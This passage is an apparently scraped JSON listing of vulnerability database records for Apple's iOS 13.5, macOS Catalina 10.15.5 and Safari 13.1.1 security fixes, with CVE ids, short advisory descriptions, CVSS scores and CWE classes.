"acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-9790"], "modified": "2023-01-09T16:41:00", "cpe": [], "id": "CVE-2020-9790", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2020-9790", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "cpe23": []}, {"lastseen": "2023-11-28T15:47:45", "description": "An information disclosure issue was addressed by removing the vulnerable code. This issue is fixed in iOS 13.5 and iPadOS 13.5, macOS Catalina 10.15.5, tvOS 13.4.5, watchOS 6.2.5. A malicious application may be able to determine another application's memory layout.", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "baseScore": 5.5, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:N/A:N", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 3.6}, "published": "2020-06-09T17:15:00", "type": "cve", "title": "CVE-2020-9797", "cwe": ["NVD-CWE-noinfo"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 4.3, "vectorString": "AV:N/AC:M/Au:N/C:P/I:N/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-9797"], "modified": "2023-01-09T16:41:00", "cpe": [], "id": "CVE-2020-9797", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2020-9797", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:P/I:N/A:N"}, "cpe23": []}, {"lastseen": "2023-11-28T15:47:47", "description": "A logic issue was addressed with improved restrictions. This issue is fixed in iOS 13.5 and iPadOS 13.5, tvOS 13.4.5, watchOS 6.2.5, Safari 13.1.1, iTunes 12.10.7 for Windows, iCloud for Windows 11.2, iCloud for Windows 7.19. Processing maliciously crafted web content may lead to arbitrary code execution.", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2020-06-09T17:15:00", "type": "cve", "title": "CVE-2020-9802", "cwe": ["NVD-CWE-noinfo"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-9802"], "modified": "2023-01-09T16:41:00", "cpe": [], "id": "CVE-2020-9802", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2020-9802", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}, "cpe23": []}, {"lastseen": "2023-11-28T15:47:54", "description": "An entitlement parsing issue was addressed with improved parsing. This issue is fixed in iOS 13.5 and iPadOS 13.5, macOS Catalina 10.15.5, tvOS 13.4.5, watchOS 6.2.5. A malicious application could interact with system processes to access private information and perform privileged actions.", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "NONE", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 7.1, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:N", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.2}, "published": "2020-06-09T17:15:00", "type": "cve", "title": "CVE-2020-9842", "cwe": ["NVD-CWE-noinfo"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "PARTIAL", "baseScore": 5.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 4.9, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-9842"], "modified": "2023-01-09T16:41:00", "cpe": [], "id": "CVE-2020-9842", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2020-9842", "cvss": {"score": 5.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:N"}, "cpe23": []}, {"lastseen": "2023-11-28T15:47:53", "description": "A logic issue existed resulting in memory corruption. This was addressed with improved state management. This issue is fixed in iOS 13.5 and iPadOS 13.5, macOS Catalina 10.15.5, tvOS 13.4.5, watchOS 6.2.5. A malicious application may be able to execute arbitrary code with kernel privileges.", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2020-06-09T17:15:00", "type": "cve", "title": "CVE-2020-9813", "cwe": ["CWE-787"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-9813"], "modified": "2021-07-21T11:39:00", "cpe": [], "id": "CVE-2020-9813", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2020-9813", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "cpe23": []}, {"lastseen": "2023-11-28T15:47:46", "description": "An out-of-bounds read was addressed with improved input validation. This issue is fixed in iOS 13.5 and iPadOS 13.5, macOS Catalina 10.15.5, tvOS 13.4.5, watchOS 6.2.5. Processing a maliciously crafted audio file may lead to arbitrary code execution.", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2020-06-09T17:15:00", "type": "cve", "title": "CVE-2020-9791", "cwe": ["CWE-125"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-9791"], "modified": "2023-01-09T16:41:00", "cpe": [], "id": "CVE-2020-9791", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2020-9791", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "cpe23": []}, {"lastseen": "2023-11-28T21:31:57", "description": "An out-of-bounds read was addressed with improved bounds checking. This issue is fixed in iOS 13.5 and iPadOS 13.5, macOS Catalina 10.15.5, tvOS 13.4.5, watchOS 6.2.5, iTunes 12.10.7 for Windows, iCloud for Windows 11.2, iCloud for Windows 7.19. A malicious application may cause a denial of service or potentially disclose memory contents.", "cvss3": {"cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "NONE", "privilegesRequired": "NONE", "baseScore": 8.1, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:N/A:H", "version": "3.1", "userInteraction": "REQUIRED"}}, "published": "2020-06-09T17:15:11", "type": "cve", "title": "CVE-2020-9794", "cwe": ["CWE-125"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "NONE", "baseScore": 5.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:N/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 4.9, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-9794"], "modified": "2023-11-07T03:27:01", "cpe": [], "id": "CVE-2020-9794", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2020-9794", "cvss": {"score": 5.8, "vector": "AV:N/AC:M/Au:N/C:P/I:N/A:P"}, "cpe23": []}, {"lastseen": "2023-11-28T15:47:49", "description": "A memory corruption issue was addressed with improved state management. This issue is fixed in iOS 13.5 and iPadOS 13.5, tvOS 13.4.5, watchOS 6.2.5, Safari 13.1.1, iTunes 12.10.7 for Windows, iCloud for Windows 11.2, iCloud for Windows 7.19. Processing maliciously crafted web content may lead to arbitrary code execution.", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2020-06-09T17:15:00", "type": "cve", "title": "CVE-2020-9807", "cwe": ["CWE-787"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-9807"], "modified": "2021-12-01T02:21:00", "cpe": [], "id": "CVE-2020-9807", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2020-9807", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}, "cpe23": []}, {"lastseen": "2023-11-28T15:47:51", "description": "An information disclosure issue was addressed with improved state management. This issue is fixed in iOS 13.5 and iPadOS 13.5, macOS Catalina 10.15.5, tvOS 13.4.5, watchOS 6.2.5. A local user may be able to read kernel memory.", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "baseScore": 5.5, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:N/A:N", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 3.6}, "published": "2020-06-09T17:15:00", "type": "cve", "title": "CVE-2020-9811", "cwe": ["NVD-CWE-noinfo"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 4.3, "vectorString": "AV:N/AC:M/Au:N/C:P/I:N/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-9811"], "modified": "2023-01-09T16:41:00", "cpe": [], "id": "CVE-2020-9811", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2020-9811", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:P/I:N/A:N"}, "cpe23": []}, {"lastseen": "2023-11-28T15:47:47", "description": "A logic issue was addressed with improved restrictions. This issue is fixed in iOS 13.5 and iPadOS 13.5, tvOS 13.4.5, watchOS 6.2.5, Safari 13.1.1, iTunes 12.10.7 for Windows, iCloud for Windows 11.2, iCloud for Windows 7.19. Processing maliciously crafted web content may lead to universal cross site scripting.", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "LOW", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "LOW", "integrityImpact": "LOW", "privilegesRequired": "NONE", "baseScore": 7.1, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:L", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 3.7}, "published": "2020-06-09T17:15:00", "type": "cve", "title": "CVE-2020-9805", "cwe": ["CWE-79"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "NONE", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 5.8, "vectorString": "AV:N/AC:M/Au:N/C:N/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 4.9, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-9805"], "modified": "2023-01-09T16:41:00", "cpe": [], "id": "CVE-2020-9805", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2020-9805", "cvss": {"score": 5.8, "vector": "AV:N/AC:M/Au:N/C:N/I:P/A:P"}, "cpe23": []}, {"lastseen": "2023-11-28T15:47:47", "description": "A memory corruption issue was addressed with improved state management. This issue is fixed in iOS 13.5 and iPadOS 13.5, tvOS 13.4.5, watchOS 6.2.5, Safari 13.1.1, iTunes 12.10.7 for Windows, iCloud for Windows 11.2, iCloud for Windows 7.19. Processing maliciously crafted web content may lead to arbitrary code execution.", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2020-06-09T17:15:00", "type": "cve", "title": "CVE-2020-9806", "cwe": ["CWE-787"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-9806"], "modified": "2021-12-01T02:29:00", "cpe": [], "id": "CVE-2020-9806", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2020-9806", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}, "cpe23": []}, {"lastseen": "2023-11-28T15:47:46", "description": "A type confusion issue was addressed with improved memory handling. This issue is fixed in iOS 13.5 and iPadOS 13.5, tvOS 13.4.5, watchOS 6.2.5, Safari 13.1.1, iTunes 12.10.7 for Windows, iCloud for Windows 11.2, iCloud for Windows 7.19. Processing maliciously crafted web content may lead to arbitrary code execution.", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2020-06-09T17:15:00", "type": "cve", "title": "CVE-2020-9800", "cwe": ["CWE-843"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-9800"], "modified": "2023-01-09T16:41:00", "cpe": [], "id": "CVE-2020-9800", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2020-9800", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}, "cpe23": []}, {"lastseen": "2023-11-28T15:47:54", "description": "An input validation issue was addressed with improved input validation. This issue is fixed in iOS 13.5 and iPadOS 13.5, tvOS 13.4.5, watchOS 6.2.5, Safari 13.1.1, iTunes 12.10.7 for Windows, iCloud for Windows 11.2, iCloud for Windows 7.19. Processing maliciously crafted web content may lead to a cross site scripting attack.", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "LOW", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "LOW", "integrityImpact": "LOW", "privilegesRequired": "NONE", "baseScore": 7.1, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:L", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 3.7}, "published": "2020-06-09T17:15:00", "type": "cve", "title": "CVE-2020-9843", "cwe": ["CWE-79"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "NONE", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 5.8, "vectorString": "AV:N/AC:M/Au:N/C:N/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 4.9, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-9843"], "modified": "2023-01-09T16:41:00", "cpe": [], "id": "CVE-2020-9843", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2020-9843", "cvss": {"score": 5.8, "vector": "AV:N/AC:M/Au:N/C:N/I:P/A:P"}, "cpe23": []}], "prion": [{"lastseen": "2023-11-22T01:50:30", "description": "A path handling issue was addressed with improved validation. This issue is fixed in iOS 13.5 and iPadOS 13.5, macOS Catalina 10.15.5, tvOS 13.4.5, watchOS 6.2.5. A malicious application may be able to overwrite arbitrary files.", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "NONE", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 7.1, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.2}, "published": "2020-10-22T19:15:00", "type": "prion", "title": "Path traversal", "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "NONE", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 5.8, "vectorString": "AV:N/AC:M/Au:N/C:N/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 4.9, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-9994"], "modified": "2020-10-26T20:26:00", "id": "PRION:CVE-2020-9994", "href": "https://www.prio-n.com/kb/vulnerability/CVE-2020-9994", "cvss": {"score": 5.8, "vector": "AV:N/AC:M/Au:N/C:N/I:P/A:P"}}, {"lastseen": "2023-11-22T01:50:10", "description": "A denial of service issue was addressed with improved input validation. This issue is fixed in iOS 13.5 and iPadOS 13.5, macOS Catalina 10.15.5, tvOS 13.4.5, watchOS 6.2.5. A remote attacker may be able to cause a denial of service.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "NONE", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "NONE", "privilegesRequired": "NONE", "baseScore": 7.5, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 3.6}, "published": "2020-06-09T17:15:00", "type": "prion", "title": "Input validation", "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "PARTIAL", "integrityImpact": "NONE", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:N/I:N/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-9827"], "modified": "2023-01-09T16:41:00", "id": "PRION:CVE-2020-9827", "href": "https://www.prio-n.com/kb/vulnerability/CVE-2020-9827", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:P"}}, {"lastseen": "2023-11-22T01:50:12", "description": "A race condition was addressed with improved state handling. This issue is fixed in iOS 13.5 and iPadOS 13.5, macOS Catalina 10.15.5, tvOS 13.4.5, watchOS 6.2.5. An application may be able to gain elevated privileges.", "cvss3": {"exploitabilityScore": 1.0, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "HIGH", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 7.0, "vectorString": "CVSS:3.1/AV:L/AC:H/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2020-06-09T17:15:00", "type": "prion", "title": "Race condition", "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 4.9, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "HIGH", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 5.1, "vectorString": "AV:N/AC:H/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-9839"], "modified": "2023-01-09T16:41:00", "id": "PRION:CVE-2020-9839", "href": "https://www.prio-n.com/kb/vulnerability/CVE-2020-9839", "cvss": {"score": 5.1, "vector": "AV:N/AC:H/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-11-22T01:50:10", "description": "A validation issue was addressed with improved input sanitization. This issue is fixed in iOS 13.5 and iPadOS 13.5, tvOS 13.4.5, watchOS 6.2.5. Processing a maliciously crafted text message may lead to application denial of service.", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "NONE", "privilegesRequired": "NONE", "baseScore": 6.5, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 3.6}, "published": "2020-06-09T17:15:00", "type": "prion", "title": "Input validation", "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "NONE", "availabilityImpact": "PARTIAL", "integrityImpact": "NONE", "baseScore": 4.3, "vectorString": "AV:N/AC:M/Au:N/C:N/I:N/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-9829"], "modified": "2023-01-09T16:41:00", "id": "PRION:CVE-2020-9829", "href": "https://www.prio-n.com/kb/vulnerability/CVE-2020-9829", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:N/I:N/A:P"}}, {"lastseen": "2023-11-22T01:50:10", "description": "A memory corruption issue was addressed with improved state management. This issue is fixed in iOS 13.5 and iPadOS 13.5, macOS Catalina 10.15.5, tvOS 13.4.5, watchOS 6.2.5. A malicious application may be able to execute arbitrary code with kernel privileges.", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2020-06-09T17:15:00", "type": "prion", "title": "Memory corruption", "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-9821"], "modified": "2023-01-09T16:41:00", "id": "PRION:CVE-2020-9821", "href": "https://www.prio-n.com/kb/vulnerability/CVE-2020-9821", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2023-11-22T01:50:10", "description": "An out-of-bounds write issue was addressed with improved bounds checking. This issue is fixed in iOS 13.5 and iPadOS 13.5, iOS 12.4.7, watchOS 6.2.5. Processing a maliciously crafted mail message may lead to unexpected memory modification or application termination.", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", 